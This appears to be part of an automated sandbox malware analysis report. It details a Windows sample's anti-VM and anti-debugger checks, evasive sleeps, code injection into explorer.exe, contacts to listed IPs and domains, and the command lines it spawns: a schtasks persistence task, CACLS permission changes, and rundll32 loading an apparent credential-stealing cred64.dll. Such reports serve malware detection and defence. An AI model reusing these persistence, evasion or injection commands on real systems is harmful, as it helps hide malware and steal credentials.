Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\thgcici Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\thgcici Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\thgcici Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\thgcici Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\thgcici Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\thgcici Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\thgcici Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\thgcici Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\thgcici Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\thgcici Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\thgcici Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\thgcici Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 848 Thread sleep count: 656 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4496 Thread sleep count: 1110 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4496 Thread sleep time: -111000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4836 Thread sleep count: 1051 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4836 Thread sleep time: -105100s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5312 Thread sleep count: 553 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5324 Thread sleep count: 917 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5324 Thread sleep time: -91700s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5348 Thread sleep count: 874 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5348 Thread sleep time: -87400s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 320 Thread sleep count: 373 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6084 Thread sleep count: 442 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6084 Thread sleep time: -44200s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2072 Thread sleep count: 121 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2072 Thread sleep time: -121000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 684 Thread sleep count: 105 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 684 Thread sleep time: -105000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3680 Thread sleep count: 120 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3680 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 2768 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 5044 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 240 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 3180 Thread sleep time: -1440000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 2768 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 3536 Thread sleep count: 103 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3536 Thread sleep time: -103000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2156 Thread sleep count: 1280 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2156 Thread sleep time: -768000000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 5540 Thread sleep count: 151 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5540 Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5716 Thread sleep count: 149 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5716 Thread sleep time: -149000s >= -30000s
Source: C:\Windows\explorer.exe TID: 5864 Thread sleep count: 148 > 30
Source: C:\Windows\explorer.exe TID: 5864 Thread sleep time: -148000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 1164 Thread sleep count: 146 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 1164 Thread sleep time: -146000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Thread delayed: delay time: 360000 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 656 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1110 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1051 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 553 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 917 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 874 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 373 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 442 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Window / User API: foregroundWindowGot 1702 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 1280 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\9545.exe API coverage: 4.9 %
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Thread delayed: delay time: 50000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Thread delayed: delay time: 360000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000 Jump to behavior
Source: explorer.exe, 00000001.00000000.294760669.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: gntuud.exe, 00000015.00000003.499375753.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpn
Source: gntuud.exe, 00000015.00000002.785290818.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499375753.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499661889.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.280449934.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000001.00000000.294760669.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000001.00000000.294760669.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000001.00000000.352809603.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000001.00000000.343444217.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000001.00000000.352809603.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Windows\explorer.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DD4D90 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo, 14_2_00DD4D90
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C2A284 FindFirstFileExW, 12_2_00C2A284
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DF1396 FindFirstFileExW, 14_2_00DF1396
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C2B3BA mov eax, dword ptr fs:[00000030h] 12_2_00C2B3BA
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C20FDC mov eax, dword ptr fs:[00000030h] 12_2_00C20FDC
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DEC0E1 mov eax, dword ptr fs:[00000030h] 14_2_00DEC0E1
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DEE6F2 mov eax, dword ptr fs:[00000030h] 14_2_00DEE6F2
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C1D7A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00C1D7A2
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C2D9C0 GetProcessHeap, 12_2_00C2D9C0
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C17C6E SetUnhandledExceptionFilter, 12_2_00C17C6E
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C177E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00C177E0
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C1D7A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00C1D7A2
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C17B0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00C17B0C
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DE8943 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_00DE8943
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DE9247 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_00DE9247
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DED260 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_00DED260

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 31.41.244.228 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 62.204.41.79 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 192.168.2.3 80
Source: C:\Windows\explorer.exe Domain query: r3oidsofsios.com
Source: C:\Windows\explorer.exe Domain query: kikangalaassociates.com
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: thgcici.1.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\thgcici Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\thgcici Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\thgcici Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\thgcici Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DD4070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree, 14_2_00DD4070
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Thread created: C:\Windows\explorer.exe EIP: 5791A08 Jump to behavior
Source: C:\Users\user\AppData\Roaming\thgcici Thread created: unknown EIP: 57E1A08 Jump to behavior
Source: C:\Users\user\AppData\Roaming\thgcici Thread created: unknown EIP: 5851A08
Writes to foreign memory regions
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: EDF380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: EDF380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: EDF380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: EDF380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: EDF380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: EDF380 Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\explorer.exe Memory written: PID: 2096 base: EDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 3940 base: 7FF69FF38150 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 1020 base: EDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 4044 base: 7FF69FF38150 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 4696 base: EDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5536 base: EDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5692 base: EDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5896 base: 7FF69FF38150 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 1004 base: EDF380 value: 90 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\9545.exe Process created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&Exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:N" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:R" /E Jump to behavior
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DD4480 ShellExecuteA, 14_2_00DD4480
Source: explorer.exe, 00000001.00000000.340737155.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312600735.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.274772666.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000001.00000000.353202489.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.340737155.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312600735.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.340737155.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312600735.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.274772666.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.339855935.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.274453869.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.312183179.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000001.00000000.340737155.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312600735.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.274772666.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: EnumSystemLocalesW, 12_2_00C2D0EA
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: EnumSystemLocalesW, 12_2_00C2D09F
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: EnumSystemLocalesW, 12_2_00C2D185
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: EnumSystemLocalesW, 12_2_00C25241
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 12_2_00C2D210
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: GetLocaleInfoW, 12_2_00C2D463
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 12_2_00C2D589
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: GetLocaleInfoW, 12_2_00C2D68F
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 12_2_00C2D75E
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: GetLocaleInfoW, 12_2_00C25763
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 12_2_00C2CDFD
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
